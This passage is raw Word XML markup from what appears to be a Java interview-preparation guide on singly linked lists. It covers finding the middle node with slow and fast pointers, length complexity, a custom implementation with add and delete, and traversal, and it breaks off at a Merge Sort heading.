          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
    </w:p>
    <w:p w14:paraId="04A6527A" w14:textId="3FA22586" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E"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To find the middle element of a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singly linked list without calculating its length</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tortoise and Hare (Slow and Fast Pointer)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6CB56"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Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA3AB36"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Use two pointers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC11F4"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low moves one step at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1679A798"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ast moves two steps at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F1F8D"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fast reaches the end, slow will be at the middle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A39F1"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Java Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DA49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2B80577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75A7B6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B247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3252C9F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2D1ACF50"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78900DF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973ED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F6F3456" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6837D00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LinkedListMiddle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4035C35D"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Node findMiddle(Node head) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6994A08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 null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E00BEE" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3660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slow = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64250E85"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fast = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAAFA06" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4646C61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fast != null &amp;&amp; fast.next != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A61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low = slow.next;         // move one step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F51D8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fast = fast.next.next;    // move two steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B8E6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512D9A4" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F34225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slow; // slow is now at the middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E168BE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201A8AE" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B108F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6B26311"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 = new Node(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F73D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 = new Node(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CECA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 = new Node(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0B1A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 = new Node(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DCBA8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next = new Node(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEC7281" w14:textId="77777777" w:rsidR="00291D8E" w:rsidRPr="004E1F60" w:rsidRDefault="00291D8E" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF1B8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middle = findMiddle(head);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50334CD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ln("Middle element: " + middle.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16F026"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A07D6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39B00CD5"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E91FB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Middle element: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5772B59A"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If the list has an even number of nodes, this will return the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second middle element</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDF2FB" w14:textId="4032E762"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90" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5F99E" w14:textId="33317C9D" w:rsidR="00246C6D" w:rsidRPr="00CE4B95" w:rsidRDefault="00246C6D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="_Toc197867639"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Complexity to find length of singly linked list?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w14:paraId="4B1AA27D" w14:textId="20096182" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304" w:rsidP="004E1F60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Time and Space Complexity to Find Length of Singly Linked List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D86090"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lastRenderedPageBreak/>
        <w:t>Time Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(n)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>You need to traverse all n nodes from head to end to count the length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD5546"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Space Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> O(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Only a constant number of variables (like a counter and a pointer) are used during traversal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBD138D" w14:textId="77777777" w:rsidR="00B86304" w:rsidRPr="004E1F60" w:rsidRDefault="00B86304"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA4001B"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int getLength(Node head) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4FD9F"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count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2B998"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head != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6C739"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ount++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105A8B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1126CB4E"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85219C0"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count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B286E3"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ED656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Only one pass is needed, so the time is linear and space remains constant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56853D51" w14:textId="6D9CFC23"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91" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80B06D" w14:textId="68D5D9CE" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00D33510">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc197867640"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you know how LinkedList works? Can you create a data structure for LinkedList</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w14:paraId="3ED79B3E" w14:textId="3003651A" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3"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Yes, a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a linear data structure where each element (called a node) contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B6473"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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The actual value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F98231"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Pointer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A reference to the next node (for singly linked list) or next and previous (for doubly linked list).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190479BB" w14:textId="77777777" w:rsidR="00315CE3"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94E8F">
          <v:rect id="_x0000_i1992" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBEABEF"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Singly Linked List – Custom Implementation in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD6E81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1B925BE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58DD54F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12E3E" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3427E84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7A079B6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10E1988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39A66D3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0B85A2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666F96" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D3D84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yLinkedList {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C45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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0493CA38" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C17CA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Add at end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD87A0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add(int data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CEF4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wNode = new Node(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A947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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F191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newNode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16232CA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5E73CDB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BA7CC4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0F54C81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next != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CDD5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31143B4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033097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next = newNode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF82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547320D" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6757E8C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Print list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289DBC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printList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC1580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2D5BE7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 != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDBE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temp.data + " -&gt; ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CE18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1DA4FFE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DF98D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 xml:space="preserve">        System.out.println("null");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B12A30"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CAC4184" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675A22C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Delete by value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4B3C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delete(int value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A2062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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2E1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data == value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A9B6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45996B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29CE604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D5157D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curr = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2D1B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next != null &amp;&amp; curr.next.data != value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553CC1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 = curr.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC894A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BFC64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curr.next != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB894C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next = curr.next.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030E82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F478AD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6A6566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164DE119"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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C1459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ain {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45976C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D2E130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MyLinkedList list = new MyLinkedList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BFD02"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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4601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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC4D6E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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C748A9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20 -&gt; 30 -&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6CC86" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00113D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delete(20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081495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30 -&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7A12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31EBAD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5CF2002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demonstrates how a singly linked list works under the hood with add, delete, and traversal operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F67BA" w14:textId="04E2B5D4"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93" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8F317" w14:textId="3EFCB3E9" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00253D26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="_Toc197867641"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w14:paraId="53518D2E" w14:textId="6884D70B" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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o traverse a singly linked list, you start from the head node and move one node at a time using the .next reference until you reach the end (null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1F586"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D4F5A9">
          <v:rect id="_x0000_i1994" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32551163"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Pseudocode to Traverse a Singly Linked List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488D89D"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unction traverseLinkedList(head):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAA3C1"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head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1498D6BE"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ent is not null:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672F045"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rint current.data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42785837"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current.next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD04F5"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E151E7">
          <v:rect id="_x0000_i1995" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313EFB7"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0089C"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is a pointer used to iterate over the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B72D4D"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current.next moves the pointer to the next node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551BAB7"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current becomes null, it means you’ve reached the end of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74CCDA"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FC7FB">
          <v:rect id="_x0000_i1996" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE3C73F"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ample Walkthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FA610"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Given LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6372761F"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10 -&gt; 20 -&gt; 30 -&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A79F3"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teps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D952E54"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head → points to 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F1831"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10, move to current = current.next → points to 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EFFB2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20, move to 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F83ABF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30, move to null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969DD0E"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Loop ends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D523B53"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77E9CF">
          <v:rect id="_x0000_i1997" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAC5CE"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When will the current node be null?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364343D5"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you’ve traversed past the last node (current.next is null), assigning current = current.next sets current to null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E0D9B"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is the termination condition of the loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113F076" w14:textId="794D278E"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98" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF7676" w14:textId="27CCF083" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="0038291C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="428" w:name="_Toc197867642"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Merge Sort</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w14:paraId="20F476D9" w14:textId="6080F347" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
